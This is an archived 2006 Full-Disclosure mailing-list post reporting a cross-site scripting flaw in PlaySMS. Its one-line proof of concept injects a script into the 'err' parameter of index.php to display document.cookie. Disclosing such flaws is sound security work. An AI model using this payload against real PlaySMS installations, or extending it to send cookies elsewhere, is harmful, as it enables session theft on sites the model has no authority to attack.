[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] XSS in PlaySMS
From:       "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail ! com>
Date:       2006-02-11 23:35:26
Message-ID: 470c3dd0602111535i311051bbtb0fe2cc4efdbb71d () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]

[Attachment #4 (text/plain)]

I Found an XSS Vulnerability in PlaySmS

Site:
playsms.sourceforge.net


PoC:
www.target.com/playsms/index.php?err=<script>alert(document.cookie);</script
>

Salam

http://mohajali.lezr.org
--
(r).....Now I Am Become Death....The Destroyer Of Worlds....(c)

[Attachment #5 (text/html)]

<div>I Found an XSS Vulnerability in PlaySmS</div>
<div>&nbsp;</div>
<div>Site:</div>
<div><a href="http://playsms.sourceforge.net">playsms.sourceforge.net</a></div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>PoC:</div>
<div><a href="http://www.target.com/playsms/index.php?err=&lt;script&gt;alert(document \
.cookie);&lt;/script">www.target.com/playsms/index.php?err=&lt;script&gt;alert(document.cookie);&lt;/script</a>&gt;</div>
 <div>&nbsp;</div>
<div>Salam</div>
<div>&nbsp;</div>
<div><a href="http://mohajali.lezr.org">http://mohajali.lezr.org</a><br>-- \
<br>&reg;.....Now I Am Become Death....The Destroyer Of Worlds....&copy; </div>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic